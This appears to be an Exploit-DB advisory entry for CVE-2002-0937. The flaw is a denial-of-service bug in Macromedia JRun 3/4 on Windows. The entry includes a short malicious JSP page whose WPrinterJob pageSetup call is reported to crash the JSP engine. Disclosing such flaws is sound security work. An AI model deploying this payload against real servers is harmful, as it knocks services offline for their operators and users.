Macromedia JRun 3/4 JSP Engine Denial of Service Vulnerability

ID EDB-ID:21536
Type exploitdb
Reporter Marc Schoenefeld
Modified 2002-06-12T00:00:00


Macromedia JRun 3/4 JSP Engine Denial Of Service Vulnerability. CVE-2002-0937. Dos exploit for windows platform


A vulnerability has been reported in Macromedia JRun for Windows that results in a denial of service condition. The vulnerability occurs when JRun encounters a malicious JSP page.

The following snippet of code is reported to crash the JRun JSP engine:
new WPrinterJob().pageSetup(null,null);

<%@ page contentType="text/html;charset=UTF-8" pageEncoding="iso-8859-1"
<%@ page import="*" %>
<%! %>

<FONT SIZE="+2">dON/T TR1 thiz @ home</font>
new WPrinterJob().pageSetup(null,null);